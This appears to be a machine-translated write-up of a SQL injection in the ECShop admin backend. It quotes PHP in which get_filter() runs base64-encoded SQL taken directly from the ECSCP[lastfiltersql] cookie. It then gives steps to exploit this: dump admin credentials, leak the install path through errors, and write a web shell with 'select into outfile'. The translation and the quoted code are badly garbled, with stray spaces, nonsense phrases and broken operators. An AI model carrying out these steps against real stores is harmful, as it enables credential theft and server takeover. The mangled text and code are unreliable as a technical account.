Lie on the ground and check the code-ecshop background Injection

Background injection has no value--however, this point can be constructed by any statement including drop database; and select into outfile also comes with a burst path to get getshell good admin \ include \ lib_main.php row 718

Function get_filter ($ param_str = '') {$ filterfile = basename (PHP_SELF ,'. php '); if ($ param_str) {$ filterfile. = $ param_str;} if (isset ($ _ GET ['uselastfilter']) & isset ($ _ COOKIE ['ecscp '] ['lastfilterfile']) & $ _ COOKIE ['ecscp '] ['lastfilterfile'] = sprintf (' % x', crc32 ($ filterfile ))) // If barabara {return array ('filter' => unserialize (urldecode ($ _ COOKIE ['ecscp '] ['lastfilter']), 'SQL' => base64_decode ($ _ COOKIE ['ecscp '] ['lastfiltersql']) // directly retrieves base64 from the cookie and ignores GPC );} else {return false ;}}

 

It's so nice to ignore the GPC input and check that the key of the array is an SQL statement. Generally, the system will go into the query and continue to flip over where get_filter is called in many places. Here we use article. php to open the code line 624:

Function get_articleslist () {$ result = get_filter (); if ($ result = false) {/* omit a bunch of */} else {$ SQL = $ result ['SQL']; // from cookie base64 ignore GPC $ filter = $ result ['filter'];} $ arr = array (); $ res = $ GLOBALS ['db']-> selectLimit ($ SQL, $ filter ['page _ size'], $ filter ['start']); // directly query/* omitting another pile */}

 

We can see that if get_filter () does not return false, we can directly retrieve the SQL in it for query... log on to the ecshop background and open http: // 127.0.0.1/admin/article. php? Act = list this get_filter () is false, so it will enter the if and use set_filter () at the bottom of the if () when you set the cookie, you will see three more cookies. Modify the cookie ECSCP [lastfiltersql] = base64. Here, the Administrator account and password are used to blow the payload. Other statements, such as exporting shell, can be used. add the parameter uselastfilter = 1 after the url to enter get_filter () the if
If the returned result is incorrect, an error is reported to display the path. Then select into outfile Solution:Base64_decode, urldecode, and then perform another check.